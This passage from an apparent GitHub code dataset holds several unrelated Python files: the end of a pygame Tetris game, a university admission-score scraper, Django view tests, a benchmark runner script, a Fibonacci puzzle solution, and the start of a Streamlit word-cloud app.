60\n self.rec_4[0] += 30\n self.rec_4[1] -= 30\n self.change_record = 0\n # 右梯\n if isinstance(self.now_box, RLadder):\n # 判断是否能变形\n if self.change_record == 0:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0] + 30, self.rec_1[1] + 30, 30, 30]\n next_x2 = [self.rec_3[0] + 30, self.rec_3[1] - 30, 30, 30]\n next_x3 = [self.rec_4[0], self.rec_4[1] + 60, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(\n rect) or pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[0] += 30\n self.rec_1[1] += 30\n self.rec_3[0] += 30\n self.rec_3[1] -= 30\n self.rec_4[1] += 60\n self.change_record = 1\n else:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0] - 30, self.rec_1[1] - 30, 30, 30]\n next_x2 = [self.rec_3[0] - 30, self.rec_3[1] + 30, 30, 30]\n next_x3 = [self.rec_4[0], self.rec_4[1] - 60, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(\n rect) or pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[0] -= 30\n self.rec_1[1] -= 30\n self.rec_3[0] -= 30\n self.rec_3[1] += 30\n self.rec_4[1] -= 60\n self.change_record = 0\n\n # 左右移动\n def transverse(self, how):\n for rec in self.border_fixed_rec:\n for x in self.recs:\n # 判断是否碰壁\n if int(how) == 1:\n next_x = [x[0]-30, x[1], 30, 30]\n else:\n next_x = [x[0]+30, x[1], 30, 30]\n if pygame.rect.Rect(next_x).colliderect(rec):\n return\n for x in self.recs:\n if int(how) == 1:\n x[0] -= 30\n else:\n x[0] += 30\n\n # 下落\n def move_down(self):\n for rec in self.border_fixed_rec:\n for x in self.recs:\n # 判断是否到底\n next_x = [x[0], x[1] + 1, 30, 30]\n if pygame.rect.Rect(next_x).colliderect(rec):\n 
self.fix()\n return\n for x in self.recs:\n x[1] += self.level\n\n # 瞬间下落\n def go_fast(self):\n my_lis = []\n for x in self.recs:\n if x[0] not in my_lis:\n my_lis.append(x[0])\n border_lis = []\n for rec in self.border_fixed_rec:\n if rec[0] in my_lis:\n border_lis.append(rec)\n border_lis.sort()\n con = 0\n while con == 0:\n for rec in border_lis:\n for x in self.recs:\n # 判断是否到底\n next_x = [x[0], x[1] + 1, 30, 30]\n if pygame.rect.Rect(next_x).colliderect(rec):\n con = 1\n if con == 0:\n for x in self.recs:\n x[1] += 1\n\n # 模拟瞬间下落\n def virtual_go_fast(self):\n my_lis = []\n for x in self.recs:\n if x[0] not in my_lis:\n my_lis.append(x[0])\n border_lis = []\n for rec in self.border_fixed_rec:\n if rec[0] in my_lis:\n border_lis.append(rec)\n border_lis.sort()\n con = 0\n virtual_recs = copy.deepcopy(self.recs)\n while con == 0:\n for rec in border_lis:\n for x in virtual_recs:\n # 判断是否到底\n next_x = [x[0], x[1] + 1, 30, 30]\n if pygame.rect.Rect(next_x).colliderect(rec):\n con = 1\n for r in virtual_recs:\n pygame.draw.rect(self.screen, [255, 100, 100], [r[0], r[1], 30, 30], 2)\n pygame.draw.line(self.screen, [255, 100, 100], (r[0], r[1]), (r[0] + 30, r[1] + 30), 2)\n pygame.draw.line(self.screen, [255, 100, 100], (r[0] + 30, r[1]), (r[0], r[1] + 30), 2)\n if con == 0:\n for x in virtual_recs:\n x[1] += 1\n\n # 创建新块\n def create_new(self):\n # 随机选择\n self.now_box = self.next_box\n self.next_box = self.choice(random.randint(1, 7))\n # 创建矩形\n self.rec_1 = self.now_box.recs[0]\n self.rec_2 = self.now_box.recs[1]\n self.rec_3 = self.now_box.recs[2]\n self.rec_4 = self.now_box.recs[3]\n # 下一个\n rec_1 = self.next_box.recs[0]\n rec_2 = self.next_box.recs[1]\n rec_3 = self.next_box.recs[2]\n rec_4 = self.next_box.recs[3]\n self.recs = [self.rec_1, self.rec_2, self.rec_3, self.rec_4]\n self.rec_1_color = self.rec_1_next\n self.rec_2_color = self.rec_2_next\n self.rec_3_color = self.rec_3_next\n self.rec_4_color = self.rec_4_next\n if self.de_color == 0:\n c = [random.randint(10, 245), random.randint(10, 245), random.randint(10, 245)]\n else:\n c = self.de_color\n self.rec_1_next = c\n self.rec_2_next = c\n self.rec_3_next = c\n self.rec_4_next = c\n # 创建下一个块\n self.small_1 = [rec_1[0]+690, rec_1[1]+190, 30, 30]\n self.small_2 = [rec_2[0]+690, rec_2[1]+190, 30, 30]\n self.small_3 = [rec_3[0]+690, rec_3[1]+190, 30, 30]\n self.small_4 = [rec_4[0]+690, rec_4[1]+190, 30, 30]\n\n # 选择块\n def choice(self, number):\n if number == 1:\n return Trig()\n elif number == 2:\n return Beeline()\n elif number == 3:\n return LBeeline()\n elif number == 4:\n return RBeeline()\n elif number == 5:\n return Field()\n elif number == 6:\n return LLadder()\n elif number == 7:\n return RLadder()\n\n # 到达底部固定\n def fix(self):\n # 消除误差\n for rect in self.recs:\n rect[1] = (rect[1] // 30) * 30 + 8\n\n # 这四个块加入累计\n self.accumulate_list.append([self.rec_1, self.rec_1_color])\n self.accumulate_list.append([self.rec_2, self.rec_2_color])\n self.accumulate_list.append([self.rec_3, self.rec_3_color])\n self.accumulate_list.append([self.rec_4, self.rec_4_color])\n # 加入边界块\n for rec in self.recs:\n self.border_fixed_rec.append(rec)\n # 判断消除\n lis = [int(self.rec_1[1]), int(self.rec_2[1]), int(self.rec_3[1]), int(self.rec_4[1])]\n li = []\n for x in lis:\n if x not in li:\n li.append(x)\n li.reverse()\n self.eliminate(li)\n # 创建新块\n self.create_new()\n # 还原变形记录\n self.change_record = 0\n\n # 判断消除\n def eliminate(self, lis):\n for y in lis:\n count = 0\n for rec in self.accumulate_list:\n if int(rec[0][1]) == int(y):\n count += 1\n 
if count == 15:\n # 清除累计\n template = []\n for rect in self.accumulate_list:\n if int(rect[0][1]) != int(y):\n template.append(rect)\n self.accumulate_list = template\n # 清除边界\n template = []\n for rect in self.border_fixed_rec:\n if int(rect[1]) != int(y):\n template.append(rect)\n self.border_fixed_rec = template\n # 加入下边界\n for x in range(21):\n self.border_fixed_rec.append([681 + x * 30, 938, 30, 30])\n # 左右边界\n for c in range(33):\n self.border_fixed_rec.append([651, 9 + c * 30, 30, 30])\n self.border_fixed_rec.append([1282, 9 + c * 30, 30, 30])\n # 上面的下移\n for rect in self.accumulate_list:\n if int(rect[0][1]) < int(y):\n rect[0][1] += 30\n if rect[0][1] % 30 == 7:\n rect[0][1] += 1\n elif rect[0][1] % 30 == 9:\n rect[0][1] -= 1\n # 重新加入检查\n lis.append(y)\n # 得分加1\n self.my_count += 1\n\n # 画出块\n def draw_box(self):\n # 不画超出范围的部分\n if self.rec_1[1] >= 40:\n pygame.draw.rect(self.screen, self.rec_1_color, self.rec_1)\n elif self.rec_1[1] >= 10:\n pygame.draw.rect(self.screen, self.rec_1_color, [self.rec_1[0], 40, 30, abs(-self.rec_1[1] + 10)])\n if self.rec_2[1] >= 40:\n pygame.draw.rect(self.screen, self.rec_2_color, self.rec_2)\n elif self.rec_2[1] >= 10:\n pygame.draw.rect(self.screen, self.rec_2_color, [self.rec_2[0], 40, 30, abs(-self.rec_2[1] + 10)])\n if self.rec_3[1] >= 40:\n pygame.draw.rect(self.screen, self.rec_3_color, self.rec_3)\n elif self.rec_3[1] >= 10:\n pygame.draw.rect(self.screen, self.rec_3_color, [self.rec_3[0], 40, 30, abs(-self.rec_3[1] + 10)])\n if self.rec_4[1] >= 40:\n pygame.draw.rect(self.screen, self.rec_4_color, self.rec_4)\n elif self.rec_4[1] >= 10:\n pygame.draw.rect(self.screen, self.rec_4_color, [self.rec_4[0], 40, 30, abs(-self.rec_4[1] + 10)])\n\n # 显示界面\n def show_info(self):\n font = pygame.font.SysFont('simhei', 20, True, True)\n # 主框\n pygame.draw.rect(self.screen, (50, 10, 200), (680, 40, 454, 900), 3)\n # 显示下一个块的框\n self.screen.blit(self.box_picture, (1430, 70))\n # 显示得分\n text = self.my_font.render('得分 %d' % self.my_count, True, (50, 50, 250))\n self.screen.blit(text, (1530, 350))\n pygame.draw.lines(self.screen, (200, 250, 0), True, [(1510, 340), (1690, 340), (1690, 390), (1510, 390)], 4)\n pygame.draw.lines(self.screen, (self.lines_color1, 0, self.lines_color3), True, [(1510, 340), (1690, 340),\n (1690, 390), (1510, 390)], 2)\n # 显示等级\n font1 = pygame.font.SysFont('songti', 50, True, True)\n text = font1.render(str(self.level), True, (200, 0, 200))\n self.screen.blit(text, (280, 190))\n text = font1.render('level', True, (200, 100, 0))\n self.screen.blit(text, (250, 110))\n pygame.draw.rect(self.screen, [0, 0, 0], [200, 150, 200, 100], 3)\n # 画出累计\n for rec in self.accumulate_list:\n pygame.draw.rect(self.screen, rec[1], rec[0])\n # 画出下一个\n pygame.draw.rect(self.screen, self.rec_1_next, self.small_1)\n pygame.draw.rect(self.screen, self.rec_2_next, self.small_2)\n pygame.draw.rect(self.screen, self.rec_3_next, self.small_3)\n pygame.draw.rect(self.screen, self.rec_4_next, self.small_4)\n # 重新开始选择框\n pygame.draw.rect(self.screen, (150, 10, 200), self.restart_box)\n pygame.draw.rect(self.screen, (0, 150, self.lines_color3), self.restart_box, 2)\n text = font.render('重新开始', True, (255, 255, 250))\n self.screen.blit(text, (1560, 466))\n # 暂停开始音乐框\n pygame.draw.rect(self.screen, (150, 0, 80), self.music_box)\n pygame.draw.rect(self.screen, (self.lines_color1, self.lines_color2, self.lines_color3), self.music_box, 2)\n if self.stop_music == 0:\n text = font.render('暂停音乐', True, (255, 255, 255))\n else:\n text = font.render('打开音乐', True, (255, 
255, 255))\n self.screen.blit(text, (1555, 605))\n # 显示格子选择框\n pygame.draw.rect(self.screen, (50, 100, 150), self.show_lines_box)\n pygame.draw.rect(self.screen, (self.lines_color1, self.lines_color2, self.lines_color3), self.show_lines_box, 2)\n if self.show_lines == -1:\n text = font.render('显示格子', True, (255, 255, 255))\n else:\n text = font.render('隐藏格子', True, (255, 255, 255))\n self.screen.blit(text, (208, 355))\n # 暂停选择框\n pygame.draw.rect(self.screen, (50, 100, 150), self.pause_box)\n pygame.draw.rect(self.screen, (self.lines_color1, self.lines_color2, self.lines_color3), self.pause_box, 2)\n font = pygame.font.SysFont('simhei', 20, True, True)\n if self.pause == -1:\n text = font.render('暂停', True, (255, 255, 255))\n else:\n text = font.render('开始', True, (255, 255, 255))\n self.screen.blit(text, (208, 405))\n # 是否画出格子\n if self.show_lines == 1:\n for x in range(14):\n pygame.draw.line(self.screen, (self.lines_color1, self.lines_color2, self.lines_color3),\n (711 + 30*x, 40), (711 + 30*x, 940), 1)\n for y in range(29):\n pygame.draw.line(self.screen, (self.lines_color1, self.lines_color2, self.lines_color3), (681, 68+30*y),\n (1132, 68+30*y), 1)\n # 画出排行榜\n # 画出边框\n pygame.draw.lines(self.screen, (250, 20, 50), False, [(400, 450), (400, 500), (160, 500), (160, 550),\n (400, 550), (400, 600), (160, 600), (160, 650)], 2)\n pygame.draw.line(self.screen, (250, 20, 50), (270, 450), (270, 650), 2)\n pygame.draw.lines(self.screen, (self.lines_color1, self.lines_color2, self.lines_color3), True,\n [(160, 450), (400, 450), (400, 650), (160, 650)], 3)\n # 表头和分数\n font = pygame.font.SysFont('fangsong', 25, True, True)\n text = font.render('排名 分数', True, (190, 60, 80))\n self.screen.blit(text, (190, 460))\n text = font.render('第一 %d' % record_list[0], True, (190, 60, 80))\n self.screen.blit(text, (190, 510))\n text = font.render('第二 %d' % record_list[1], True, (190, 60, 80))\n self.screen.blit(text, (190, 560))\n text = font.render('第三 %d' % record_list[2], True, (190, 60, 80))\n self.screen.blit(text, (190, 610))\n if self.level < 15:\n self.level = self.my_count // 5 + 1\n # # 测试:画出边框矩形\n # for rec in self.border_fixed_rec:\n # pygame.draw.rect(self.screen, (200, 0, 100), rec)\n\n # 判断Game Over\n def judge_end(self):\n for rec in self.accumulate_list:\n if rec[0][1] < 50:\n self.end = 1\n # 判断是否破纪录\n if self.my_count > record_list[0]:\n record_list[0], record_list[1], record_list[2] = self.my_count, record_list[0], \\\n record_list[1]\n elif self.my_count > record_list[1]:\n record_list[1], record_list[2] = self.my_count, record_list[1]\n elif self.my_count > record_list[2]:\n record_list[2] = self.my_count\n # 写入文件\n f = open('./record.txt', 'w')\n f.write(str(record_list))\n f.close()\n\n # 改变颜色\n def change_color(self):\n if self.mix_color == 1:\n # 实时改变格子颜色\n # R\n if self.lines_color3 == 255 and self.lines_color2 == 0:\n if self.lines_color1 < 255:\n self.lines_color1 += 3\n else:\n self.lines_color1 = 255\n elif self.lines_color3 == 0 and self.lines_color2 == 255:\n if self.lines_color1 > 0:\n self.lines_color1 -= 3\n else:\n self.lines_color1 = 0\n # G\n if self.lines_color1 == 255 and self.lines_color3 == 0:\n if self.lines_color2 < 255:\n self.lines_color2 += 3\n else:\n self.lines_color2 = 255\n elif self.lines_color1 == 0 and self.lines_color3 == 255:\n if self.lines_color2 > 0:\n self.lines_color2 -= 3\n else:\n self.lines_color2 = 0\n # B\n if self.lines_color1 == 0 and self.lines_color2 == 255:\n if self.lines_color3 < 255:\n self.lines_color3 += 3\n else:\n self.lines_color3 
= 255\n elif self.lines_color1 == 255 and self.lines_color2 == 0:\n if self.lines_color3 > 0:\n self.lines_color3 -= 3\n else:\n self.lines_color3 = 0\n # 改变按钮颜色\n font = pygame.font.SysFont('simhei', 20, True, True)\n pos = pygame.mouse.get_pos()\n if self.restart_box.collidepoint(pos[0], pos[1]):\n text = font.render('重新开始', True, (255, 0, 0))\n self.screen.blit(text, (1560, 466))\n elif self.show_lines_box.collidepoint(pos[0], pos[1]):\n if self.show_lines == -1:\n text = font.render('显示格子', True, (0, 0, 255))\n else:\n text = font.render('隐藏格子', True, (0, 0, 255))\n self.screen.blit(text, (208, 355))\n elif self.pause_box.collidepoint(pos[0], pos[1]):\n if self.pause == -1:\n text = font.render('暂停', True, (0, 0, 255))\n else:\n text = font.render('开始', True, (0, 0, 255))\n self.screen.blit(text, (208, 405))\n elif self.music_box.collidepoint(pos[0], pos[1]):\n if self.stop_music == 0:\n text = font.render('暂停音乐', True, (0, 0, 255))\n else:\n text = font.render('打开音乐', True, (0, 0, 255))\n self.screen.blit(text, (1555, 605))\n\n # 主循环\n def began(self):\n while 1:\n self.time_record += 1\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n key_press = pygame.key.get_pressed()\n # alt+f4退出\n if key_press[K_LALT] and key_press[K_F4]:\n pygame.display.quit()\n exit()\n # 移动变形\n if self.pause == -1:\n if key_press[K_LEFT]:\n self.transverse(1)\n if key_press[K_RIGHT]:\n self.transverse(2)\n if key_press[K_UP]:\n self.change()\n if key_press[K_DOWN]:\n Thread(target=self.go_fast).start()\n self.down_fast = 1\n # RALT固定格子\n if key_press[K_RALT]:\n self.mix_color *= -1\n if self.mix_color == -1:\n [self.lines_color1, self.lines_color2, self.lines_color3] = [0, 0, 0]\n elif event.type == MOUSEBUTTONDOWN:\n bd = pygame.mouse.get_pressed()\n if bd[0] == 1:\n pos = pygame.mouse.get_pos()\n # 左键单击重新开始\n if self.restart_box.collidepoint(pos[0], pos[1]):\n # 判断是否破纪录\n if self.my_count > record_list[0]:\n record_list[0], record_list[1], record_list[2] = self.my_count, record_list[0], \\\n record_list[1]\n elif self.my_count > record_list[1]:\n record_list[1], record_list[2] = self.my_count, record_list[1]\n elif self.my_count > record_list[2]:\n record_list[2] = self.my_count\n # 写入文件\n f = open('./record.txt', 'w')\n f.write(str(record_list))\n f.close()\n self.__init__()\n continue\n # 左键单击显示/隐藏格子\n elif self.show_lines_box.collidepoint(pos[0], pos[1]):\n self.show_lines *= -1\n # 左键单击暂停\n elif self.pause_box.collidepoint(pos[0], pos[1]):\n self.pause *= -1\n # 左键单击打开暂停BGM\n elif self.music_box.collidepoint(pos[0], pos[1]):\n if self.stop_music == 0:\n pygame.mixer_music.pause()\n self.stop_music = 1\n else:\n pygame.mixer_music.unpause()\n self.stop_music = 0\n self.screen.blit(self.bg_picture, (0, 0))\n # 下落\n if self.pause == -1:\n self.move_down()\n # 显示\n self.show_info()\n self.draw_box()\n self.virtual_go_fast()\n # 实时改变按钮颜色\n self.change_color()\n # 判断结束\n if self.end == 0:\n self.judge_end()\n if 0 < self.end < 3:\n # 显示Game Over\n text = self.my_font.render('Game Over!', True, (255, 50, 100))\n self.screen.blit(text, (850, 450))\n text = self.my_font.render('最终得分 %d' % self.my_count, True, (255, 50, 100))\n self.screen.blit(text, (840, 550))\n self.end += 1\n if self.end != 3:\n pygame.display.update()\n\n\n# 各种块的初始坐标\nclass Trig(object):\n def __init__(self):\n self.recs = [\n [892, -22, 30, 30],\n [892, 8, 30, 30],\n [862, 8, 30, 30],\n [922, 8, 30, 30],\n ]\n\n\nclass Beeline(object):\n def __init__(self):\n self.recs = [\n [892, -82, 30, 30],\n [892, -52, 30, 30],\n [892, 
-22, 30, 30],\n [892, 8, 30, 30],\n ]\n\n\nclass LBeeline(object):\n def __init__(self):\n self.recs = [\n [862, -22, 30, 30],\n [892, 8, 30, 30],\n [862, 8, 30, 30],\n [922, 8, 30, 30],\n ]\n\n\nclass RBeeline(object):\n def __init__(self):\n self.recs = [\n [922, -22, 30, 30],\n [892, 8, 30, 30],\n [862, 8, 30, 30],\n [922, 8, 30, 30],\n ]\n\n\nclass Field(object):\n def __init__(self):\n self.recs = [\n [862, -22, 30, 30],\n [862, 8, 30, 30],\n [892, -22, 30, 30],\n [892, 8, 30, 30],\n ]\n\n\nclass LLadder(object):\n def __init__(self):\n self.recs = [\n [892, -22, 30, 30],\n [892, 8, 30, 30],\n [862, -22, 30, 30],\n [922, 8, 30, 30],\n ]\n\n\nclass RLadder(object):\n def __init__(self):\n self.recs = [\n [892, -22, 30, 30],\n [892, 8, 30, 30],\n [862, 8, 30, 30],\n [922, -22, 30, 30],\n ]\n\n\nrussia = Russia()\nrussia.began()\n","repo_name":"yunyuyuan/pygame","sub_path":"俄罗斯方块/Russia.py","file_name":"Russia.py","file_ext":"py","file_size_in_byte":38160,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"31901891557","text":"import requests\nimport json\nimport pandas as pd\n\ndef bjtupost(sort=None, year=None, province=None):\n url = 'https://zsw.bjtu.edu.cn/score/query.html'\n From_data = {'sort': sort, 'type': '非定向', 'school': '校本部',\n 'year': year, 'province': province}\n Headers = {'X-Requested-With': 'XMLHttpRequest'}\n response = requests.post(url, data=From_data, headers=Headers)\n content = json.loads(response.text)\n return content['data'][3:]\n\n\nprovinces = ['北京', '天津', '河北', '山西', '内蒙古', '辽宁', '吉林',\n '黑龙江', '上海', '江苏', '浙江', '安徽', '福建', '江西',\n '山东', '河南', '湖北', '湖南', '广东', '广西', '河南',\n '重庆', '四川', '贵州', '云南', '西藏', '陕西', '甘肃',\n '青海', '宁夏', '新疆', '港澳台侨']\nyears = ['2019', '2018', '2017']\nsorts = ['理工', '文史']\n\nCollege = []\nYear = []\nProvince = []\nCategory = []\nMajor = []\nScore = []\nContributor = []\n\nif __name__ == '__main__':\n for year in years:\n for province in provinces:\n for sort in sorts:\n result = bjtupost(sort, year, province)\n for i in range(len(result)):\n College.append('北京交通大学')\n Year.append(year)\n Province.append(province)\n Category.append(result[i]['xkml'])\n Major.append(result[i]['zymc'])\n Score.append(result[i]['zdf'])\n Contributor.append('09118104谈笑')\n\nall_data = {'College': College, 'Year': Year, 'Province': Province, 'Category': Category,\n 'Major': Major, 'Score': Score, 'Contributor': Contributor}\n\nall_data_df = pd.DataFrame(all_data)\nall_data_df.to_csv('09118104谈笑-北京交通大学.csv', index=False)\n\n\n\n","repo_name":"eshoyuan/GaokaoRecommend","sub_path":"crawler/17-19录取分数爬虫/09118104北京交通大学.py","file_name":"09118104北京交通大学.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"} +{"seq_id":"23772299911","text":"import json\n\nimport pytest\nfrom django.test.client import RequestFactory\nfrom django.test.utils import override_settings\nfrom django.utils.encoding import force_str\n\nfrom infotv.views import InfoTvView\n\nEXAMPLE_DECK_DATA = {\n \"decks\": {\n \"default\": [\n {\n \"duration\": 1,\n \"content\": \"# test\",\n \"type\": \"text\",\n \"id\": \"s24t7h1n0q\"\n },\n {\n \"duration\": 1,\n \"src\": \"https://placehold.it/304x220\",\n \"type\": \"image\",\n \"id\": \"s2534m3sqo\"\n },\n {\n \"duration\": 1,\n \"type\": \"nownext\",\n \"id\": \"s2533iqgbo\"\n }\n ],\n \"testdeck\": [\n {\n \"type\": \"text\",\n \"duration\": 1,\n \"id\": \"s29nhihhe8\",\n \"content\": \"slide in 
testdeck\"\n }\n ]\n },\n \"eep\": None\n}\n\n\ndef get_deck_post_request():\n return RequestFactory().post(\"/\", {\"action\": \"post_deck\", \"data\": json.dumps(EXAMPLE_DECK_DATA)})\n\n\n@pytest.mark.django_db\ndef test_post_deck(rf, settings):\n settings.INFOTV_POLICY_CLASS = \"infotv.policy.AnythingGoesPolicy\"\n request = get_deck_post_request()\n last_deck_id = 0\n for _x in range(3):\n response = InfoTvView.as_view()(request=request, event=\"dsfargeg\")\n assert response.status_code == 200\n deck_id = json.loads(force_str(response.content))[\"id\"]\n assert deck_id > last_deck_id\n last_deck_id = deck_id\n response = InfoTvView.as_view()(request=rf.get(\"/\", {\"action\": \"get_deck\"}), event=\"dsfargeg\")\n deck_data = json.loads(force_str(response.content))\n assert deck_data[\"id\"] == last_deck_id\n assert deck_data[\"data\"] == EXAMPLE_DECK_DATA\n\n\n@pytest.mark.django_db\ndef test_get_bogus_event_deck(rf):\n response = InfoTvView.as_view()(request=rf.get(\"/\", {\"action\": \"get_deck\"}), event=\"dkfjstwr4iunm\")\n assert json.loads(force_str(response.content))[\"id\"] == \"missing\"\n\n\n@pytest.mark.django_db\ndef test_post_deck_auth():\n request = get_deck_post_request()\n with override_settings(INFOTV_POLICY_CLASS=\"infotv.policy.BasePolicy\"):\n response = InfoTvView.as_view()(request, event=\"dsfargeg\")\n assert response.status_code == 401\n","repo_name":"kcsry/infotv","sub_path":"infotv_test/tests/test_deck.py","file_name":"test_deck.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2093224145","text":"import constants\nimport argparse\nimport utils\nimport importlib\nimport Metrics.main as run_metrics\n\n\ndef main(datasets, models, metrics, plot_results, force_execution):\n for dataset_name in datasets:\n for model_name in models:\n if force_execution: utils.delete_precomputed_results(dataset_name, model_name)\n\n if utils.found_precomputed_results(dataset_name, model_name):\n print('Found precomputed results for ' + model_name + ' on ' + dataset_name + ' dataset')\n continue\n\n print('Running ' + model_name + ' on ' + dataset_name + ' dataset')\n model = importlib.import_module(constants.MODELS_PATH + '.' + model_name + '.main')\n model.main(dataset_name)\n\n if metrics:\n cum_perf = 'perf' in metrics\n multimatch = 'mm' in metrics\n human_scanpath_prediction = 'hsp' in metrics\n\n run_metrics.main(datasets, models, cum_perf, multimatch, human_scanpath_prediction, plot_results)\n\n\nif __name__ == \"__main__\":\n available_models = utils.get_dirs(constants.MODELS_PATH)\n available_datasets = utils.get_dirs(constants.DATASETS_PATH)\n available_metrics = constants.AVAILABLE_METRICS\n parser = argparse.ArgumentParser(\n description='Run a given set of visual search models on specific datasets and compute the corresponding metrics'\n )\n parser.add_argument('--d', '--datasets', type=str, nargs='*', default=available_datasets,\n help='Names of the datasets on which to run the models. \\\n Values must be in list: ' + str(available_datasets))\n parser.add_argument('--m', '--models', type=str, nargs='*', default=available_models,\n help='Names of the models to run. \\\n Values must be in list: ' + str(available_models))\n parser.add_argument('--mts', '--metrics', type=str, nargs='*', default=available_metrics,\n help='Names of the metrics to compute. \\\n Values must be in list: ' + str(available_metrics) + '. \\\n Leave blank to not run any. 
WARNING: If not precomputed, human scanpath prediction (hsp) will take a LONG time!'\n )\n parser.add_argument('--noplot', action='store_true',\n help='Do not plot metrics. Useful for leaving it running and going AFK.')\n parser.add_argument('--f', '--force', action='store_true',\n help='Deletes all precomputed results and forces models\\' execution.')\n\n args = parser.parse_args()\n invalid_models = not all(model in available_models for model in args.m)\n invalid_datasets = not all(dataset in available_datasets for dataset in args.d)\n invalid_metrics = not all(metric in available_metrics for metric in args.mts)\n if (not args.m or invalid_models) or (not args.d or invalid_datasets) or invalid_metrics:\n raise ValueError('Invalid set of models, datasets or metrics')\n\n main(args.d, args.m, args.mts, not args.noplot, args.f)\n","repo_name":"FerminT/VisualSearchBenchmark","sub_path":"run_benchmark.py","file_name":"run_benchmark.py","file_ext":"py","file_size_in_byte":3001,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"3"} +{"seq_id":"35696085367","text":"n = int(input())\r\narr = []\r\n\r\nfor i in range(n):\r\n arr.append(input().strip())\r\nset_arr = set(arr)\r\narr = list(set_arr) # remove duplicates\r\narr.sort() # sort lexicographically\r\narr.sort(key = len) # then sort by length (Python's sort is stable, so lexicographic order is kept within each length)\r\n\r\nfor i in arr:\r\n print(i)","repo_name":"Hitbee-dev/Coding_test","sub_path":"baekjoon/12.sort/1181.py","file_name":"1181.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14999443260","text":"\"\"\"\nEP - 25\n\nThe Fibonacci sequence is defined by the recurrence relation:\n\nFn = Fn−1 + Fn−2, where F1 = 1 and F2 = 1.\nHence the first 12 terms will be:\n\nF1 = 1\nF2 = 1\nF3 = 2\nF4 = 3\nF5 = 5\nF6 = 8\nF7 = 13\nF8 = 21\nF9 = 34\nF10 = 55\nF11 = 89\nF12 = 144\nThe 12th term, F12, is the first term to contain three digits.\n\nWhat is the index of the first term in the Fibonacci sequence to contain 1000 digits?\n\"\"\"\n\ndef fibonacci(limit):\n # This function generates the fibonacci series until\n # an element in this series contains 1000 digits.\n fib_list = [1,1]\n F1, F2 = 1, 1\n while True:\n total = F1 + F2\n fib_list.append(total)\n if len(str(total)) == limit:\n val = fib_list.index(total)+1 # python has 0 indexing!!\n break\n F2, F1 = total, F2\n return val,fib_list # return the index and the sequence\n\nif __name__ == \"__main__\":\n limit = 1000\n index, fib_seq = fibonacci(limit)\n print(\"The first term in the Fibonacci sequence to contain 1000 digits is at {} location\".format(index))\n print(\"First 20 Fibonacci Sequence {}\".format(fib_seq[:20]))\n","repo_name":"supria68/ProjectEuler","sub_path":"python/find_fibonacci.py","file_name":"find_fibonacci.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13660826630","text":"import streamlit as st\n\nimport csv\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nimport re\nimport zipfile\n\nimport fitz\nimport nltk\nimport pdfplumber\nimport pytesseract\n\nfrom collections import Counter\nfrom io import StringIO\nfrom nltk.corpus import stopwords\nfrom os import listdir\nfrom os.path import isfile, join\nfrom tqdm import tqdm\nfrom wordcloud import WordCloud\n\n# Configure page title\nst.set_page_config(page_title=\"Multi-WordCloud Generator\")\n\nnltk.download('stopwords')\n\nuploaded = {} # to hold files and file info 
after uploading\nINDIVIDUAL_WORD_CLOUDS = False\nCONTAINS_SCANNED_PDFS = False # Set to true if you know your data contains scanned documents, but you cannot specify which are scanned\nSCANNED_PDFS_TAGGED = False # Only set to True if you have named ALL scanned PDFs correctly i.e. file name ends with _scanned.pdf\n\n# add title\nst.title(\"Multi-WordCloud Generator\")\n# add a subtitle\nst.subheader(\"An OCR-enabled research tool for generating wordclouds from multiple files at a go.\")\n# Note on supported formats\nst.info(\"Currently supports PDFs, Word Documents, and raw text files.\", icon='ℹ️')\n# Add file uploader\nuploaded_files = st.file_uploader(\n \"Add your reference PDF files:\", accept_multiple_files=True)\n\ncombine_wordcloud = st.checkbox('Combine Wordclouds')\n\ndef create_word_cloud(text, title):\n # Removing non-alphanumeric characters in string\n re_pattern = re.compile(r'[^\\w\\s]', re.UNICODE)\n text = re_pattern.sub('', text)\n\n # Remove unnecessary words (stop words) like \"the\", \"and\", etc.\n words_to_count = text.split() # Split sentence into list of words\n stop_word_set = set(stopwords.words('english'))\n words_to_count = [word for word in words_to_count if word not in stop_word_set] # Remove stop words\n\n # Count the words using Python's Counter\n word_cloud_dict = Counter(words_to_count)\n\n wordcloud = WordCloud(\n max_font_size=40, \n background_color=\"white\"\n ).generate_from_frequencies(word_cloud_dict)\n \n fig, ax = plt.subplots()\n # ax.figure(figsize=(16, 10))\n ax.imshow(wordcloud, interpolation='bilinear')\n ax.axis(\"off\")\n ax.set_title(title)\n\n st.pyplot(fig)\n\n\ndef get_combined_cloud(uploaded_files):\n files_text = \"\"\n for uploaded_file in uploaded_files:\n # PDFs\n if uploaded_file.name.lower().endswith('.pdf'):\n with fitz.open(stream=uploaded_file.read()) as doc:\n for page in doc.pages():\n extracted_text = page.get_text()\n # If no text was found, assume page was scanned and treat as picture\n if len(extracted_text) == 0:\n pix = page.get_pixmap()\n output = \"outfile.png\"\n pix.save(output)\n files_text += (pytesseract.image_to_string('outfile.png').lower() + \" \")\n os.remove(\"./outfile.png\")\n else:\n files_text += (extracted_text + \" \")\n # WORD DOCS\n elif uploaded_file.name.lower().endswith(('.doc', '.docx')):\n docx = zipfile.ZipFile(uploaded_file)\n single_file_text = docx.read('word/document.xml').decode('utf-8')\n single_file_text = re.sub('<(.|\\n)*?>','',single_file_text).lower()\n files_text += (single_file_text + \" \")\n # PLAIN TEXT\n else:\n single_file_text = 